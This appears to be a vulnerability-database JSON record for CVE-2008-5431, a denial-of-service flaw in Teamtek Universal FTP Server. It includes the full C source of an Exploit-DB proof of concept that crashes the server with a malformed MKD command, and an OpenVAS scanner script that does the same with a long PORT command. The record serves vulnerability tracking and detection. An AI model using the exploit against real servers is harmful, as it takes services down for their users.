{"id": "CVE-2008-5431", "bulletinFamily": "NVD", "title": "CVE-2008-5431", "description": "Teamtek Universal FTP Server 1.0.44 allows remote attackers to cause a denial of service via (1) a certain CWD command, (2) a long LIST command, or (3) a certain PORT command.\nPer Hyperlink Record 1049337:\r\n\r\nThe vulnerabilities are all confirmed in version 1.0.50 and vulnerability #1 is also confirmed in version 1.0.44. Other versions may also be affected.\r\n", "published": "2008-12-11T15:30:00", "modified": "2018-10-11T20:55:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5431", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/archive/1/488142/100/200/threaded", "http://securityreason.com/securityalert/4722", "http://www.securityfocus.com/bid/27804", "http://secunia.com/advisories/22553"], "cvelist": ["CVE-2008-5431"], "type": "cve", "lastseen": "2019-05-29T18:09:29", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "3892729ace9d41a2fdcaf8f630414185"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "2427ed4a1a968314ac841d918c6c28a8"}, {"key": "cpe23", "hash": "878bc3a3b435153f1a5e70a26f8737ef"}, {"key": "cvelist", "hash": "54b8903b345abe9e7a74b6bd30f5da4f"}, {"key": "cvss", "hash": "41b62a8aa1ee5c40897717cadc30784a"}, {"key": "cvss2", "hash": "85fc9715d07b57d9e72056856b007c7b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "8f86c7293d44c8296c20d65972a66c4d"}, {"key": "href", "hash": "4828be6bb06be69faaf0bc4ecb131374"}, {"key": "modified", "hash": "c8e100629246f19790da179d0e3111b4"}, {"key": "published", "hash": "e806ddb142b11ee64ec3a7afc2ef615c"}, {"key": "references", "hash": "3096e982a02872bfbd7ff1002e527d0c"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "86a7c472985b18739a161f583065d437"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ce5b8a3a6d330f9ae058350068bdbeff5e609e2b271c8af4f54d2c1cdb699d01", "viewCount": 0, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2019-05-29T18:09:29"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:2787"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800322"]}], "modified": "2019-05-29T18:09:29"}, "vulnersScore": 5.2}, "objectVersion": "1.3", "cpe": ["cpe:/a:5e5:teamtek_universal_ftp_server:1.0.50", "cpe:/a:5e5:teamtek_universal_ftp_server:1.0.44"], "affectedSoftware": [{"name": "5e5 teamtek_universal_ftp_server", "operator": "eq", "version": "1.0.44"}, {"name": "5e5 teamtek_universal_ftp_server", "operator": "eq", "version": "1.0.50"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:5e5:teamtek_universal_ftp_server:1.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:5e5:teamtek_universal_ftp_server:1.0.50:*:*:*:*:*:*:*"], "cwe": ["CWE-20"]}

{"exploitdb": [{"lastseen": "2016-01-31T17:03:17", "bulletinFamily": "exploit", "description": "UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit. CVE-2008-5431. Dos exploit for windows platform", "modified": "2006-11-15T00:00:00", "published": "2006-11-15T00:00:00", "id": "EDB-ID:2787", "href": "https://www.exploit-db.com/exploits/2787/", "type": "exploitdb", "title": "UniversalFTP 1.0.50 MKD Remote Denial of Service Exploit", "sourceData": "/*\n=============================================================\nDoS Exploit for UniversalFTP version 1.0.50\n=============================================================\nUniversalFTP (www.teamtek.net)\nhttp://www.5e5.net/cgi-bin/download3.asp\nSuffers from several unhandled user input vulnerabilities that\ncause the program to crash.\n\nI originally found this vulnerability on October 27th and wrote\nthis but got caught up working with the Renasoft PSS Exploit\nand forgot to report it.\n\nThe vulnerability was posted to secunia by Parvez Anwar November\n13th - good job and thanks to him :).\n\n\n\n*/\n\n\n\n#include <stdio.h>\n#include <string.h>\n#include <windows.h>\n#include <winsock.h>\n\n#define BUFF_SIZE 1024\n\n#pragma comment(lib,\"wsock32.lib\")\n\nint main(int argc, char *argv[])\n{\nWSADATA wsaData;\nchar buffer[BUFF_SIZE];\n\nstruct hostent *hp;\nstruct sockaddr_in sockin;\nchar buf[300], *check, *cmd;\nint sockfd, bytes;\nint i;\nchar *hostname;\nunsigned short port;\n\nif (argc <= 1)\n {\n printf(\"\\n==================================================================\\n\");\n printf(\"UniversalFTP v1.0.50 Denial Of Service PoC Code\\n\");\n printf(\"Discovered By: Parvez Anwar and Greg Linares (glinares.code\n[at ] gmail [dot] com)\\n\");\n printf(\"Original Reported By: Parvez Anwar\\n\");\n printf(\"Usage: %s [hostname] [port]\\n\", argv[0]);\n printf(\"default port is 21 \\n\");\n printf(\"====================================================================\\n\");\n exit(0);\n }\n\ncmd = argv[3];\nhostname = argv[1];\nif (argv[2]) port = atoi(argv[2]);\nelse port = atoi(\"21\");\n\nif (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)\n {\n fprintf(stderr, \"Error setting up with WinSock v1.1\\n\");\n exit(-1);\n }\n\n\n hp = gethostbyname(hostname);\n if (hp == NULL)\n {\n printf(\"ERROR: Uknown host %s\\n\", hostname);\n printf(\"%s\",hostname);\n exit(-1);\n }\n\n sockin.sin_family = hp->h_addrtype;\n sockin.sin_port = htons(port);\n sockin.sin_addr = *((struct in_addr *)hp->h_addr);\n\n if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)\n {\n printf(\"ERROR: Socket Error\\n\");\n exit(-1);\n }\n\n if ((connect(sockfd, (struct sockaddr *) &sockin,\n sizeof(sockin))) == SOCKET_ERROR)\n {\n printf(\"ERROR: Connect Error\\n\");\n closesocket(sockfd);\n WSACleanup();\n exit(-1);\n }\n\n printf(\"Connected to [%s] on port [%d], sending exploit....\\n\",\n hostname, port);\n\n\n if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)\n {\n printf(\"ERROR: Recv Error\\n\");\n closesocket(sockfd);\n WSACleanup();\n exit(1);\n }\n\n // wait for SMTP service welcome\n\n buf[bytes] = '\\0';\n check = strstr(buf, \"2\");\n if (check == NULL)\n {\n printf(\"ERROR: NO response from SMTP service\\n\");\n closesocket(sockfd);\n WSACleanup();\n exit(-1);\n }\n printf(\"%s\\n\", buf);\n\n\n\n char Exploit[] = \"MKD \\\\..\\\\******\\\\|\\\\******\";\n\n\n send(sockfd, Exploit, strlen(Exploit),0);\n Sleep(1000);\n printf(\"[*] FTP DoS Packet Sent\\n\");\n\n closesocket(sockfd);\n WSACleanup();\n}\n\n// milw0rm.com [2006-11-15]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2787/"}], "openvas": [{"lastseen": "2019-05-29T18:40:28", "bulletinFamily": "scanner", "description": "The host is running Universal FTP server and is prone to Denial of\n Service Vulnerabilities.", "modified": "2019-02-12T00:00:00", "published": "2008-12-16T00:00:00", "id": "OPENVAS:1361412562310800322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800322", "title": "Teamtek Universal FTP Server Multiple Commands DoS Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_teamtek_uftp_serv_mult_cmd_dos_vuln.nasl 13613 2019-02-12 16:12:57Z cfischer $\n#\n# Teamtek Universal FTP Server Multiple Commands Denial Of Service Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800322\");\n script_version(\"$Revision: 13613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-12 17:12:57 +0100 (Tue, 12 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-16 16:12:00 +0100 (Tue, 16 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2008-5431\");\n script_bugtraq_id(27804);\n script_name(\"Teamtek Universal FTP Server Multiple Commands DoS Vulnerabilities\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/teamtek/universal_ftp/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/22553\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/488142/100/200/threaded\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allows remote attackers to crash the affected\n application, denying the service to legitimate users.\");\n script_tag(name:\"affected\", value:\"Teamtek, Universal FTP Server version 1.0.50 and prior on Windows.\");\n script_tag(name:\"insight\", value:\"The flaws are exists due to run-time error while executing CWD, LIST, PORT,\n STOR, PUT and MKD commands. These commands are not properly sanitised.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"summary\", value:\"The host is running Universal FTP server and is prone to Denial of\n Service Vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://www.5e5.net/universalftp.html\");\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\nport = get_ftp_port( default:21 );\nbanner = get_ftp_banner( port:port );\nif( ! banner || \"UNIVERSAL FTP SERVER\" >!< banner )\n exit( 0 );\n\nsoc = open_sock_tcp(port);\nif( ! soc ) {\n exit( 0 );\n}\n\n# Authenticate with anonymous user (Before crash)\nif( ! ftp_authenticate( socket:soc, user:\"anonymous\", pass:\"anonymous\" ) ) {\n exit( 0 );\n}\n\nftp_send_cmd( socket:soc, cmd:string(\"PORT AAAAAAAAAAAAAAAAA \\r\\n\") );\nsleep( 5 );\nclose( soc );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) {\n security_message( port:port );\n exit( 0 );\n} else if( soc ) {\n # Re-authenticate with anonymous user (After crash)\n if( ! ftp_authenticate( socket:soc, user:\"anonymous\", pass:\"anonymous\" ) ) {\n security_message( port:port );\n exit( 0 );\n }\n close( soc );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}